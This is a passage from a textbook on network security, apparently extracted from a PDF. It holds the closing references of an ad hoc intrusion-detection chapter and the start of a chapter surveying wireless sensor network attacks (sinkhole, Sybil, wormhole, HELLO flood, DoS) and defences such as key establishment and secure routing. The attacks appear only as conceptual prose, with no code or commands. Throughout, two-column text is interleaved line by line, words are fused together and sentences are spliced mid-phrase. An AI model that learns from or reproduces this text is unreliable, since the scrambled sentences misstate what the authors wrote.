ties of routing control message have to be derived. National Colloquium for Information System
These derived parameters will aid in analyzing the Security Education.
feasibility of various detection methodologies.
Second, the absence of a centralized node Athanasiades, N., Abler, R., Levine, J., Owen, H.,
necessitates innovative adaptation in the IDS. & Riley, G. (2003). Intrusion detection testing and
Adaptation is the process of learning new attacks, benchmarking methodologies. Paper presented at
attack resolving techniques (responses), as well the First IEEE International Workshop on Infor-
as changing statistical parameters with respect to mation Assurance, IWIAS 2003.
the ad hoc network environment. Adaptation in a Awerbuch, B., Curtmola, R., Holmer, D., Nita-Ro-
highly dynamic network is an interesting and new taru, C., & Rubens, H. (2004). Mitigating Byzantine
challenge. Efficiency of various computational attacks in ad hoc wireless networks. John Hopkins
intelligence methods, which are also used in con- University, Department of Computer Science.
ventional IDS, has to be analyzed. Learning new
attacks through intelligence in ad hoc IDS paradigm Awerbuch, B., Curtmola, R., Holmer, D., Rubens,
is an unexplored research domain. H., & Nita-Rotaru, C. (2005). On the survivability
of routing protocols in ad hoc wireless networks.

Paper presented at the Security and Privacy for Hubaux, J.-P., Buttyan, L., & Capkun, S. (2001).
Emerging Areas in Communications Networks, The quest for security in mobile ad hoc networks.
SecureComm 2005. Paper presented at the 2nd ACM international
Symposium on Mobile Ad hoc Networking &
Balajinath, B., & Raghavan, S. V. (2001). Intru-
Computing, Long Beach, CA.
sion detection through learning behavior model.
Computer Communications, 24(12), 1202-1212. Jacoby, G. A., Marchany, R., & Davis, N. J., IV.
(2004). Battery-based intrusion detection a firs
Bhargava, S., & Agrawal, D. P. (2001, Fall). Secu-
line of defense. Paper presented at the Information
rityenhancementsinAODVprotocolforwireless
Assurance Workshop, 2004/Proceedings from the
ad hoc networks. Paper presented at the IEEE 54th
Fifth Annual IEEE SMC.
Vehicular Technology Conference, VTC 2001.
Kachirski, O., & Guha, R. (2002). Intrusion de-
Brutch, P., & Ko, C. (2003). Challenges in intru-
tection using mobile agents in wireless ad hoc
sion detection for wireless ad-hoc networks. Paper
networks. Paper presented at the IEEE Workshop
presented at the Applications and the Internet
on Knowledge Media Networking, 2002.
Workshops, 2003.
Kong, J., Hong, X., & Gerla, M. (2003). A new set of
Bykova, M., Ostermann, S., & Tjaden, B. (2001).
passive routing attacks in mobile ad hoc networks.
Detecting network intrusions via a statistical
Paper presented at the Military Communications
analysis of network packet characteristics. In
Conference, MILCOM 2003. IEEE.
Proceedings of the 33rd Southeastern Symposium
on System Theory, 2001. Lamport, L., Shostak, R., & Pease, M. (1982). The
Byzantine generalsproblem. ACM Transactions
Debar, H., Dacier, M., & Wespi, A. (1999). To-
on Programming Languages and Systems, 4(3),
wards a taxonomy of intrusion-detection systems.
382-401.
Computer Networks-the International Journal of
Computer and Telecommunications Networking, Little, M. (2005). TEALab: A testbed for ad hoc
31(8), 805-822. networking security research. Paper presented at
the Military Communications Conference, MIL-
Duda, R. O., Hart, P. E., & Stork, D. G. (2000).
COM 2005. IEEE.
Patternclassification (2nd ed.). Wiley Inter-Science
Publication. Michael, C. C., & Ghosh, A. (2000). Two state-
based approaches to program-based anomaly
Hijazi, A., & Nasser, N. (2005). Using mobile
detection. Paper presented at the 16th Annual
agents for intrusion detection in wireless ad hoc
Conference Computer Security Applications,
networks. Paper presented at the Second IFIP
ACSAC ’00.
International Conference on Wireless and Optical
Communications Networks, WOCN 2005 Mishra, A., Nadkarni, K., & Patcha, A. (2004).
Intrusion detection in wireless ad hoc networks.
Hossain, M., Bridges, S. M., & Vaughn, R. B.,
IEEE Wireless Communications, 11(1), 48-60.
Jr. (2003). Adaptive intrusion detection with data
mining. Paper presented at the IEEE International Nadkarni, K., & Mishra, A. (2003). Intrusion de-
Conference on Systems, Man and Cybernetics, tection in MANETS: The second wall of defense.
2003. Paper presented at the 29th Annual Conference of
the IEEE Industrial Electronics Society, IECON
Huang, Y. A., & Lee, W. (2004). Attack analysis
2003.
and detection for ad hoc routing protocols. Recent
advances in intrusion detection, proceedings Papadimitratos, P., & Haas, Z. (2002, January 27-
(Vol. 3224, pp. 125-145). Berlin: Springer-Verlag 31). Secure routing for mobile ad hoc networks. Pa-
Berlin. per presented at the SCS Communication Networks

and Distributed Systems Modeling and Simulation Zhang, Y. G., Lee, W. K., & Huang, Y. A. (2003).
Conference (CNDS 2002), San Antonio. Intrusion detection techniques for mobile wireless
networks. WirelessNetworks, 9
(5), 545-556.
Patrick, A., Olivier, C., Jean-Marc, P., Bernard,
J., Ludovic, M., & Ricardo, P. (2002). Security in
ad hoc networks: A general intrusion detection kEy tErMs
architecture enchancing trust based approaches.
Paper presented at the 1st International Workshop Ad Hoc Networks: Ad hoc networks are loosely
on Wireless Info. Sys., Cicudad Real, Spain. organized and configured network. There are no
centralized nodes, such as routers, gateways, and
Pokrajac, D., & Lazarevic, A. (2004). Applications
so forth. All network functions are done by every
of unsupervised neural networks in data mining.
node and thereby every node supports the network’s
Paper presented at the 7th Seminar on Neural
functioning.
Network Applications in Electrical Engineering,
NEUREL 2004. Anomaly Detection: Anomaly detection is
a type of intrusion detection in which historical
Ramanujan, R., Ahamad, A., Bonney, J., Hagel-
normal behavior of the network is used. Any de-
strom, R., & Thurber, K. (2000). Techniques for
viation of a behavior from the normal will raise
intrusion-resistant ad hoc routing algorithms
an alarm.
(TIARA).
Audit Trails: Audit trails describe a network
Sergio, M., Giuli, T. J., Kevin, L., & Mary, B.
or node behavior. It contains values for a set of
(2000). Mitigating routing misbehavior in mobile
parameters, which is recorded in periodic intervals
ad hoc networks. Paper presented at the Conference
of time. The parameter set is called as the feature
Name|.RetrievedAccessDate|.fromURL|.
set and usually differs between different network
Shimomura, T., & Markoff, J. (1996). Take down: environments, protocols, and systems.
The pursuit and capture of Kevin Mitnick, Amer-
Intrusion/Attack: Intrusion is a behavior of
ica’s most notorious cyber-criminal; by the man
an external or internal node(s) with malign intent,
who did it. London: Secker & Warburg.
which aims to affect other benign nodes in the
Verwoerd, T., & Hunt, R. (2002). Intrusion detec- network.
tion techniques and approaches. Computer Com-
Intrusion Detection: Intrusion detection is the
munications, 5 2 1356-1365.
(15),
process of identifying and distinguishing malicious
Yang, S., & Baras, J. S. (2003). Modeling vulner- behaviorfromthenormalnetworktraffic.
abilities of ad hoc routing protocols. Paper pre-
Misbehavior Detection: Misbehavior detection
sented at the 1st ACM Workshop on Security of Ad
is a complement to anomaly detection. In this type
Hoc and Sensor Networks, Fairfax, Virginia.
of intrusion detection, known intrusion behavior
Zhang, Y., Huang, Y.-A., & Lee, W. (2005). An patterns are used. Any resemblance of a behavior
extensible environment for evaluating secure with these patterns will result in an alarm.
MANET. Paper presented at the First International
Mobile Agents: Mobile agents are specialized
Conference on Security and Privacy for Emerging
software which move between nodes to accomplish
Areas in Communications Networks, SecureComm
their assigned tasks, such as data collection and
2005.
so forth.

Chapter XXXIV
Security in Wireless
Sensor Networks
Luis E. Palafox
CICESE Research Center, Mexico
J. Antonio Garcia-Macias
CICESE Research Center, Mexico
AbstrAct
In this chapter we present the growing challenges related to security in wireless sensor networks. We
show possible attack scenarios and evidence the easiness of perpetrating several types of attacks due to
the extreme resource limitations that wireless sensor networks are subjected to. Nevertheless, we show
thatsecurityisafeasiblegoalinthisresource-limitedenvironment;toprovethats
survey several proposed sensor network security protocols targeted to different layers in the protocol
stack. The work surveyed in this chapter enable several protection mechanisms vs. well documented
network attacks. Finally, we summarize the work that has been done in the area and present a series of
ongoing challenges for future work.
IntroductIon resource limitations, mainly in available memory

space and energy source. Both limitations represent
Recently, wireless sensor networks (WSN) have great obstacles for the integration of traditional
gained great popularity, mainly because they security techniques. The highly unreliable com-
provide a low cost alternative to solving a great munication channels that are used in WSN and
variety of real-world problems (Akyildiz, Su, & the fact that they operate unattended make the
Sankarasubramaniam, 2003). Their low cost en- integration of security techniques even harder.
ableds the deployment of large amounts of sensor Wireless sensor networks today offer the pro-
nodes (in the order of thousands, and in the future cessing capabilities of computers of a few decades
perhaps millions), which most of the time operate ago and the industry’s trend is to reduce the cost
under harsh environments. WSN present extreme of wireless sensing nodes while maintaining the
Security in Wireless Sensor Networks
same processing power. Based on this idea, many • Unreliable transfers. The packets can be
researchers have started to face the challenge of corrupted or even discarded due to errors in
maximizing processing capabilities and reduc- the communication channel or to congested
ing energy consumption while protecting sensor nodes which results in packet loss; as a con-
networks from possible attacks. sequence, application developers are forced
to allocate extra resources for error handling.
Most importantly is the fact that if a protocol
bAckground does not have the appropriate mechanisms
for error handling, packets including criti-
WSN have many more limitations than other tradi- cal security information could be lost (e.g.,
tional computer networks. Due to these limitations, a cryptographic key).
it is unfeasible to use the traditional security ap- • Conflicts.Evenifwehadareliablecommuni -
proaches in these resource-constrained networks. cation channel, the communication still could
Thus,todevelopefficientsecuritytechniques, itis due to the broadcast nature of
be unreliable
imperative to consider the limitations involved. sensor networks. If a collision occurs in the
middleofatransfer,therewouldbeconflicts
Extremely limited resources and the transfer itself would fail. On a highly
populated network this can be a big problem,
Every security mechanism requires a certain as has already been pointed out (Akyildiz, Su,
amount of resources for its implementation, Sankarasubramaniam, & Cayirci, 2002).
these resources include data memory, program •
Latency. Multihop routing, network conges-
memory, and energy source to power the sensor tion, and in-network processing can introduce
node; however, these resources are very scarce in latency to the network, making synchroniza-
sensor nodes. tiondifficultbetweennodes.Synchronization
problems can be critical for network security
• Memory limitations. In order to implement an mechanisms that rely on error reporting and
efficientsecuritymechanism,thealgorithm cryptographic key distribution. Some real/
used for such implementation must have a time communications techniques could be
small footprint. used in WSN (Stankovic, Abdelzaher, Lu,
• Energy limitations. When including security Sha, & Hou, 2003).
mechanisms, careful attention should be paid
to energy-depleting factors including the con- unattended operation
sumed energy in computation of the security
functions (i.e., encrypt, decrypt, data signa- On most wireless sensor network applications,
tures,signatureverification),the consumed
nodes are left unattended for long time periods. The
energy of additional security related data three main disadvantages of leaving the network
transmissions or overhead (i.e., initialization unattended are:
vectors required for encrypt/decrypt), and the
energy spent in storing the security related • Exposure to physical attacks. The network
parameters (i.e., cryptographic keys). can be deployed in an environment open
to adversaries, in undesirable climatologic
Highly unreliable communication conditions, and so forth. Thus, the probability
Medium of a node suffering a physical attack is much
higher than in typical computers on traditional
Unreliable communication is another threat to networks, which normally are placed on a
WSN. The security relies heavily on a defined secure location and only face attacks through
protocol, which depends on communication. the network.

• Remote management. Remote network encrypted to a certain extent for protecting

management makes practically impossible againsttrafficanalysisattacks.
the detection of physical attacks or network
maintenance problems. The most extreme The traditional approach for keeping - confi
example is perhaps when a node is being dential information secret is to encrypt it using a
usedonamilitarybattlefieldreconnaissance secret key that only the destination node knows,
application; in that case the node would no thus,resultinginconfidentiality.
longer have physical contact with the user
once deployed. Data Integrity
• No central point of administration. A sensor
network must be distributed, with no central Withtheimplementationofconfidentiality - anad
point of administration. However, if its design versary may be unable to steal any data from the
is not adequate, network organization would sensor network. However, this does not imply that
behard,inefficient,andfragile. the data are secure. The adversary could still be
able to modify the data to the degree of affecting
Summarizing, the time the sensor network the overall operation of the network. For instance,
spends unattended is directly proportional to the a malicious user may add or remove certain frag-
probability of an adversary performing an attack ments to a packet. Then, this packet could be sent to
on any of its nodes. its original destination. The data loss or corruption
can occur even without the presence of a malicious
security requirements user due to harsh environmental conditions. Thus,
data integrity helps to assure that the received data
Wireless sensor networks share many character- havenotbeenmodifiedintransit.
istics with traditional networks, including their
security requirements; however, they also introduce Data Freshness
several requirements that are exclusive to them.
Eventhoughdataconfidentialityandintegrityha
Data Confidentiality been achieved, we must assure that each message
is fresh. Data freshness suggests that the data are
Dataconfidentialityisthebiggest - problem innet
recent, and assures that no old message has been
work security. Every network with any security ap- resent. This requirement is especially important
proach would probably address this issue before any when shared keys strategies are being used. Typi-
other. In sensor networks, confidentiality relates
cally, shared keys need to be renewed over time.
to the following (Carman, Kruus, & Matt, 2000; However, it takes time to propagate the new keys
Perrig, Szewczyk, Tygar, Wen, & Culler, 2002): through the entire network. Under this scheme,
it would be easy for an adversary to perpetrate
• Asensornodemustnotfiltersensor readings
a packet replay attack. Furthermore, it would be
to its neighbors; particularly on military ap- easy to corrupt the operation of the network if the
plications where the stored data in a node nodes are not well informed of the time at which
canbehighlyconfidential. the key will change. To solve this problem, a time
• On many applications, the nodes need to dependent counter may be added to the packet for
communicate highly confidential data assuringi.
( e.data
, freshness.
key distribution), thus, it is very important
to build a secure communication channel in Authentication
WSN.
• The nodes’ public information, such as Besides modifying packets, an adversary can also
their identity and their public keys, can be potentially alter the ow fl of the packets throu

the addition of fake packets to the network. Con- exible

fl forconfiguringitselfaccordingtoseveral
sequently, the adversary can make receiving node situations.Thereisnofixedinfrastructure - toa
believe that the data comes from an authentic minister a sensor network. This also brings a great
source. Additionally, authentication is needed for challenge for security in this type of networks.
several administrative tasks (i.e., dynamic network For instance, the dynamic nature of the network
reprogramming, controlling node duty cycle). Thus, suggest of preinstalling a key shared between the
we can determine that message authentication is base station and the rest of the nodes (Eschenauer
important for many sensor network applications. & Gligor, 2002). Several schemes of random key
distribution have been proposed in the context
Availability of symmetric encryption techniques (Chan, Per-
rig, & Song, 2003; Eschenauer & Gligor, 2002;
Adjusting current traditional encryption algo- Hwang & Kim, 2004; Liu, Li, & Ning, 2005). In
rithms to sensor network implies an additional the area of public key cryptography on wireless
cost. Some approaches suggest modifying code to sensor networks, this same dynamicity requires
favor code reutilization as much as possible. Other efficient mechanisms for key distribution. WSN
approaches tend to use additional communication must autoconfigure for key management and for
to achieve the same goal. Other more radical ap- establishing trust relationships among nodes, in
proaches impose restrictions to the data or propose a similar way as they autoconfigure to perform
less robust schemes (like centralized schemes) to multihop routing.
simplify algorithms. But all of these approaches Ifasensornetworklacksofautoconfiguration,
decrease the level of availability of the nodes and the damage done by an adversary or even by the
consequently, the availability of the entire network hostile environment could be fatal.
for the following reasons:
security Attacks on wireless sensor
• The introduction of additional processing networks
results in additional power consumption. If
we exhaust the available energy of a node, The nature of the WSN makes them vulnerable
its data would no longer be available. to several types of attacks. Such attacks can be
• Introducing additional communication perpetrated in a variety of ways, most notably are
operations also consumes more energy. the denial or service attacks (DoS), but there are
Furthermore, adding more communication alsotrafficanalysisattacks,eavesdropping, - physi
considerably increases the probability of cal attacks, and others. DoS attacks in wireless
generating a collision. sensor networks go from simple communication
• If we introduce a centralized scheme, it channel saturation techniques to more sophisticated
would only have a single point, which can designed to tamper with the message authentication
be a constant threat to the availability of the code (MAC) layer protocol (Perrig, Stankovic, &
entire network. Wagner, 2004).
Due to the great differences in available energy
The implementation of security mechanisms and computational power, protecting against a well
not only interferes with network operation, it also designed denial-of-service attack is practically
can considerably affect availability of the entire impossible. A more powerful node could easily
network. block any other normal node, and consequently,
prevent the sensor network from performing its
Autoconfiguration function.
We can observe that attacks on sensor networks
WSN are an extreme case of ad hoc networks, are not exclusively restricted to denial-of-service
which require that each node be independent and attacks; among these other types of attacks we can
0
include compromised nodes, attacks to routing nerable to attacks than their counterparts in ad hoc
protocols, and physical attacks. networks. Most attacks on network layer protocols
fall into one of the following categories:
Attack scenario
• Spoofed, altered, or replayed routing informa-
To propose and develop efficient prevention tion.and
This attack is directed toward the routing
recuperation mechanisms for attacks on wire- information that is exchanged between nodes.
less sensor networks it is important to know and By spoofing, altering, or replaying routing
understand the nature of the potential adversar- information, the adversaries could potentially
ies;thesecanbeclassifiedintwogroups(Karlof create routing loops, attract or repel network
&Wagner, 2003): mote class adversaries and laptop traffic,lengthenorshortenroutes,generat
class adversaries. In the first case, the adversary fake error messages, partition the network,
has access to sensor nodes. In contrast, the laptop increase node to node latency, and so forth.
class adversary has access to more powerful de- • Selective forwarding. Multihop networks
vices such as personal computers, PDAs, and so often operate assuming faithfully that mes-
forth. Thus, in this case, the devices have many sages will be received by their destination.
advantages over legit nodes: larger energy source, On a selective forwarding attack, malicious
more powerful processors, and they could also nodes could prevent forwarding certain mes-
have high-power transmitters or a highly sensitive sages or even discard them; consequently,
antennatoeavesdropontraffic. these messages would not propagate through
A laptop class adversary can produce more dam- the network. A simple form of this attack is
age as opposed to an adversary that only has access very easy to be detected because the neigh-
to a few sensor nodes. For instance, a sensor node bor nodes could easily infer that the route
can only block radio links in a small neighborhood is no longer valid and use an alternate one.
while an adversary with a laptop computer could A more subtle form of this attack is when
block the entire sensor network with the help of a and adversary selectively forwards packets.
more powerful transmitter. Furthermore, a laptop Therefore, if an adversary is interested in
class adversary could potentially eavesdrop on the suppressing or modifying packets that come
traffic of the entire network, while a mote fromclass
certain source, the adversary could se-
adversary could only eavesdrop on the traffic in lectively forwardtherestofthetraffic,thus
a very limited area. the adversary would not raise any suspicion
Anothercommonlyusedadversary - classifica
of the attack.
tion considers external and internal adversaries. • Sinkhole attacks. In a sinkhole attack, the
Previously, we discussed external attacks, where goal of the adversary is to attract all the traf-
the adversaries do not have any access to the sen- fic to a certain area or the network through
sor network. Conversely, internal attacks are those a compromised node, creating a sinkhole
perpetrated by an authorized participant in the (metaphorically speaking). Due to the fact
network that has turned malicious. Internal attacks that the nodes that are located across the route
can be mounted from compromised nodes that are have the ability to alter application data, the
executing malicious codes or from laptop comput- sinkhole attacks could facilitate other types
ers that have access to cryptographic materials, of attacks (like selective forwarding for in-
data, and codes from authorized nodes. stance).
• Sybil attacks. In a Sybil attack (Douceur,
Attacks to Routing Protocols 2002), a node presents multiple identities to
the rest of the nodes. Sybil attacks are a threat
Most routing protocols for WSN are very simple; to geographical routing protocols, since they
due to this simplicity, they are generally more vul- requiretheexchangeofcoordinates - foreffi

cient packet routing. Ideally, we would expect Attacks to Data Aggregation Techniques
that a node only sends a set of coordinates,
but under a Sybil attack, an adversary could Data aggregation in wireless sensor networks can
pretend to be in many places at once. significantly reduce communication overhead
• Wormhole attacks. In a wormhole attack compared to all the nodes sending their data
(Hu, Perrig, & Johnson, 2002) an adversary to the base station. However, data aggregation
builds a virtual tunnel through a low latency complicates even more network security. This is
link that takes the messages from one part of due to the fact that every intermediate node could
the network and forwards them to another. potentially modify, forge, or discard messages.
The simplest case of this attack is when one Therefore, a single compromised node could be
node is located between two other nodes that abletoalterthefinalaggregationvalue.Intrud
are forwarding. However, wormhole attacks node and compromised node attacks are two major
commonly involve two distant nodes that threats to security in sensor networks that use data
are colluded to underestimate the distance aggregation techniques.
between them and forward packets through
an external communication channel that is Physical Attacks
only available to the adversary.
• HELLOood
fl attacks.Someprotocolsrequire Sensor networks often operate in hostile environ-
nodes to send HELLO packets to advertise ments. In those environments, the size of the nodes
themselves to their neighbors. If a node re- plus the unattended operation mode contributes
ceives such packet, it would assume that it is to make them very vulnerable to physical attacks
inside the RF range of the node that sent that (i.e., node destruction) (Wang, Gu, Schosek,
packet. However, this assumption could be Chellappan, & Xuan, 2005c). In contrast to other
false because a laptop class adversary could types of attacks, physical attacks destroy the nodes
easily send these packets with enough power permanently, thus, their loss is irreversible. For
to convince all the network nodes that the instance, an adversary could extract cryptographic
adversary is their neighbor. Consequently, keys, alter the node’s circuitry, and reprogram it
nodes close to the adversary may try to use or replace it with malicious nodes (Wang, Gu,
the adversary as a route to the base station, Chellappan, Xuan, & Lai, 2005b). Previous work
while nodes further away would send packets shows that a Berkeley MICA2 mote (one of the
directly to the adversary. But the transmission most commonly used in the research community)
power of those nodes is much less that the can be compromised in less than a minute. Even
adversary’s, thus, the packets would get lost, though these results are not surprising, because
and that would create a state of confusion in MICA2 motes do not have any physical protec-
the sensor network. tion mechanism, they give us a good idea of what
• Acknowledgement spoofing. Some routing a well-trained adversary can do.
algorithms require the use of acknowledge-
ment signals (ACK). In this case, an adversary defense countermeasures
could spoof this signal in response to the
packets that the adversary listens to. This In this section we will present some security
results in convincing the transmitting node mechanisms that have been proposed in the lit-
that a weak link is strong. Thus, an adversary erature and that help in meeting the security
could perform a selective forwarding attack requirements discussed earlier. For this purpose,
afterspoofingACKsignalstothenode that
we will begin by discussing the key establishment
the adversary intends to attack. process in WSN which is the base for security in
this type of networks. We will follow that with a

description of security mechanisms for preventing Overview

denial-of-service attacks, defense against routing
protocolattacks,howtoprotectfrom - traffic
The analy
key establishment and key management prob-
sis attacks, defending against sensor node privacy lems are not exclusive to sensor networks. In fact,
attacks, and protection against physical and data this type of problems has been thoroughly studied
aggregation attacks. in the wireless network community. Traditionally,
key establishment is performed through some
Key Establishment Process public key protocol. The most commonly used
is Diffie-Hellman (Diffie & Hellman,,6) but 79 1
One important aspect of security that has received there are many more.
a great deal of attention from the research com- However, most of the traditional techniques are
munity is the key establishment process in WSN. not suitable for low-power devices such as sensor
Due to the fact that encryption and key establish- nodes. This is due to the fact that these techniques
ment are crucial elements in security defense use asymmetric cryptography, which is also known
mechanisms, and most security mechanisms rely as public key cryptography. In this case it is required
on pure encryption, we will give a general overview to maintain two mathematically related keys, one
on encryption before going into any details about of which is public while keeping the other private.
specificsecuritydefensemechanisms. The problem with public key cryptography in WSN
Table 1. A summary of the analysis for cipher performance (Law et al. 2004)
By key setup
Size Optimized Speed Optimized

Rank
Code mem. Data mem. Speed Code mem. Data mem. Speed
1 RC5-32 MISTY1 MISTY1 RC6-32 MISTY1 MISTY1
2 KASUMI Rijndael Rijndael KASUMI Rijndael Rijndael
3 RC6-32 KASUMI KASUMI RC5-32 KASUMI KASUMI
4 MISTY1 RC6-32 Camellia MISTY1 RC6-32 Camellia
5 Rijndael RC5-32 RC5-32 Rijndael Camellia RC5-32
6 Camellia Camellia RC6-32 Camellia RC5-32 RC6-32
By encryption mode
Size Optimized Speed Optimized

Rank
Code mem. Data mem. Speed Code mem. Data mem. Speed
1 RC5-32 RC5-32 Rijndael RC6-32 RC5-32 Rijndael
2 RC6-32 MISTY1 MISTY1 RC5-32 MISTY1 Camellia
3 MISTY1 KASUMI KASUMI MISTY1 KASUMI MISTY1
4 KASUMI RC6-32 Camellia KASUMI RC6-32 RC5-32
5 Rijndael Rijndael RC6-32 Rijndael Rijndael KASUMI
6 Camellia Camellia RC5-32 Camellia Camellia RC6-32

is that, computationally speaking, it is very heavy predistribution technique it is not necessary that
for the sensor nodes. However, there has been work each pair of nodes share a key. However, every pair
that shows that implementation is viable if a proper of nodes that does share a key may use that key to
selection of algorithms is made (Gaubatz, Kaps, & establish a direct secure connection between them.
Sunar 2004; Gura, Patel, Wander, Eberle, & Shantz, Eschenauer and Gligor (2002) show that under this
2004; Malan, Welsh, & Smith, 2004; Watro, Kong, scheme it is highly probable that sensor nodes can
Fen Cuti, Gardiner, Lynn, & Kruus, 2004). operate with shared keys.
For these reasons, symmetric encryption is the The LEAP protocol (Zhu, Setia, & Jajodia, 2003)
more widely selected technique for applications adopts the approach of using multiple techniques
that cannot handle the computational complexity of for key establishment. Here, the authors make the
asymmetric encryption. Symmetric techniques use observation than any mechanism by itself provides
a single key that is shared by the two communicating security for every type of connection in wireless
parties. This key is used for data encryption and networks. Thus, in this work they present four
decryption. The traditional example of symmetric different types of keys that are used depending on
encryption is the DES (data encryption standard) the communication type to be established.
algorithm. However, the use of DES has decreased In PIKE (Chan & Perrig, 2005), the authors de-
significantlybecauseitcanbeeasily - broken. Cur
scribe a mechanism for establishing a key between
rently, other algorithms such as 3DES (triple DES), two nodes based on the trust that both nodes have
RC5, AES, and others (Schneier, 1996). toward a third node in the same network. The shared
An analysis of several cipher algorithms (Law, keys of each node are propagated throughout the
Doumen, & Hartel, 2004) is summarized in Table network in such a way that for every node A and
I,wheretwoclassificationsaremade:one B abynode
key C exists that shares a key with A and B.
setup and the other by encryption mode. In both Thus, the key establishment protocol between A
classificationsthealgorithmswereand optimized for routed through C.
B can be securely
code size and speed and aspects such as speed, code Perrig et al. (2002) propose a key distribution
size, and required data memory were evaluated. schemeforsecurebroadcastauthentificationnam
A great challenge for symmetric encryption TESLA.
: ThemainideaofTESLA : istoachieve
is the problem of key management. The problem asymmetric cryptography through the delayed
resides in the fact that both parties need to know disclosure of symmetric keys.
the key prior to starting secure communication. It is important to point out that the most sig-
Thus, the problem can be summarized as follows: nificantadvancesintheintegration - ofpubliccryp
how can we assure that only the two communicat- tography to WSN (which will be discussed next)
ing parties know the key and no one else havedoes?
been made recently. This makes random key
Distributing secret keys is not an easy problem to predistribution a less interesting topic.
solve because preinstalling the key in the sensor
node is not always an option. Public Key Cryptography
Key Establishment Protocols Two of the more commonly used public key cryp-
tography algorithms are RSA and ECC (Schneier,
There are several random key predistribution 1996). Traditionally, it was thought that these tech-
techniques that have been proposed. Eschenauer niques were way too complex for applying them
and Gligor (2002) propose a scheme based on to WSN. However, successful implementations of
probabilistic key sharing among sensor nodes. public key cryptographic systems in WSN have
This scheme operates first by distributing a keyrecently.
been published
chain to all participant nodes before their deploy- Gura et al. (2004) report that it is possible to
ment. Each key chain consists of a set of keys implement RSA and ECC in 8-bit microprocessors,
that has been randomly selected from a larger demonstrating a performance advantage of ECC
offline-generatedkeyset.Tousetherandom key Another advantage is that the 160-bit
over RSA.

key in ECC generates shorter messages during countermeasures mechanisms are required. One
transmission compared to the 1024-bit key of RSA. approach to defend against the classic channel jam-
Particularly, this work demonstrates that the dot ming attack is to identify the part of the network
product operations used in ECC execute faster thatisjammedandroutetrafficaroundthatare
than the operations in RSA. Wood and Stankovic (2002) describe a two phase
Watro et al. (2004) show that certain parts of approach where nodes along the perimeter of the
the RSA cipher can be implemented on current jammed area report their status to their neighbors
sensor network platforms, particularly in the whothencollaborativelydefinethejammedregion
MICA2 Berkeley motes (Hill, Szewczyk, Woo, and simply route around it.
Hollar, Culler, & Pister, 2000). They implemented To protect against jamming at the MAC layer,
the public key operations in the sensor nodes nodes could use an admission control mechanism
while the private ones were performed in more that limits their transmission rate. This would al-
powerful devices. In this case they used a laptop low the network to ignore the requests designed to
computer. exhaust the node’s energy source. However, this is
Malan et al. (2004) propose a scheme based not an optimal solution because the network must
on ECC and show an implementation of the Dif- beabletohandlelargevolumesoftraffic.
fie-Hellmanalgorithmbasedontheelliptic curve
To protect against malicious nodes that inten-
discrete logarithm problem. While key generation tionallymisroutetrafficcouldbedoneatthecos
is by no means fast (around 34 seconds for gener- of redundancy. In this case, a node can send the
ating the pair of keys and another 34 seconds for message through multiple routes, thus increasing
generating the secret key), this probably would the probability that the message will arrive to its
sufficeforapplicationsthatdonotrequire frequent
finaldestination simplybecausethemessagedoes
key renewal. not rely on a single route to get there.
Preventing Against denial-of-service defending Against routing Protocol

Attacks
In Table 2 we show the most common denial of
service attacks and their corresponding coun- Routing protocols for WSN has been a well stud-
termeasures classified by layers. Due to ied the fact
topic to a certain extent. However, most of the
that DoS attacks are very common, efficient research efforts focus mainly in providing energy
Table 2. Wireless sensor network DoS attacks/defenses

Layer Attacks Defenses
Physical Jamming Spread-spectrum, priority messaging, lower
duty cycle, region mapping, mode change
Tampering Tamper-proof, hiding
Link Collision Error correcting code
Exhaustion Rate limitation
Unfairness Small frames
Network (routing) Neglect and greed Redundancy, probing
Homing Encryption
Misdirection Egressfiltering,authorizationmonitoring
Black holes Authorization, monitoring, redundancy
Transport Flooding Client puzzles
Desynchronization Authentication

efficient routing mechanisms. There is a large

simply not forward the request done by the base
demand of routing protocols that besides offering station.
energyefficiencytheyalsooffersecurityagainst To avoid this, Deng et al. (2002) use a technique
certain network attacks such as sinkhole attacks, similartoTESLA : whereone-waykeychainsare
wormholes attacks, and the Sybil attack. As the used to authenticate the message from the base
WSN range of applications is increasing as well station.
as its network densities, secure routing will be a Tanachaiwiwat, Dave, Bhindwale, and Helmy
design factor that must be considered for future (2003) introduce a novel technique that they called
applications. TRANS (trust routing for location aware networked
sensors). This routing protocol was proposed for
security techniques for routing data-centric networks. It also uses delayed key
Protocols disclosure to achieve asymmetric cryptography.
In their implementation, they use TESLA : for
Deng, Han, and Mishra (2002) introduce an INtru- message authentication and confidentiality. B
sion tolerant routing protocol for sensor networks using TESLA,
: TRANS can be sure that a mes
-
(INSENS). This protocol is based on minimizing sage follows a trusted route through location-based
the damage caused by an intruder and keep rout- routing. The approach consists of the base station
ing despite its presence, without having to identify sending an encrypted broadcast message to its
the intruder. In this work, the authors state that neighbors. Only those trusted neighbors would
an intruder does not have to be a malicious node have the key required to decrypt that message.
necessarily, it very well could be a node that is just The trusted neighbors would add their location
malfunctioning for physical reasons. Identifying a to the route (for returning messages), and would
malicious node from a malfunctioning one could encrypt the message now with their own keys
beextremelydifficult.Forthisreasonthey and sendmake the message to the neighbor closest to
nodistinctionbetweenthem.Thefirsttechnique the destination. When the message arrives to its
that they propose is to mitigate the damage caused destination, the receiving node must authenticate
by a potential intruder by applying redundancy. the source (in this case the base station) using a
This is, as we previously mentioned, sending a MAC that belongs to the base station. Afterwards,
packet through multiple routes. the node can simply send a message to the base
They also assume that there are large dif- station through the trusted route that the original
ferences in available resources between the base message followed.
station and the sensor nodes, thus, they propose An important challenge in the area of secure
that routing table computation is to be performed routing for wireless networks is that it is very easy
at the base station. This is done in three phases. In to disrupt the routing protocol by simply disrupt-
thefirstphasethebasestationbroadcastarequest ing the route discovery process. Papadimitratos
that propagates through the entire network. On the and Haas (2002) propose a secure route discovery
next phase, the base station collects information protocol that guarantees, under certain condi-
about node connectivity. Finally, the base station tions, that the correct network topology would be
computes a series of routing tables for each node. obtained. This protocol is very similar to TRANS.
These tables include redundant routing information The security relies on the MAC layer and in an
used for the redundant message transmission we accumulation on the node identities that are in-
discussed earlier. cluded in the route. By doing this, a source node
There are several attacks that could be launched can discover the network topology because each
to the routing protocol during each one of the three node from the source to the destination appends
phases. On the first phase, a node couldits spoof
identitya to the message. In order to ensure that
request done by the base station. A malicious node the message has not been tampered with, a MAC
could forward the request through a fake route or code is also appended to the message, which can

be authenticated by either the destination or by the Some researchers have proposed certain tech-
source (for returning messages). niques that make use of anonymity mechanisms.
For instance, Gruteser and Grunwald (2003a)
How to Protect from Traffic Analysis analyze the feasibility of anonymizing location
Attacks information for location-based services in an
automotive telematic environment. Beresford and
There are some strategies to protect from(2003)
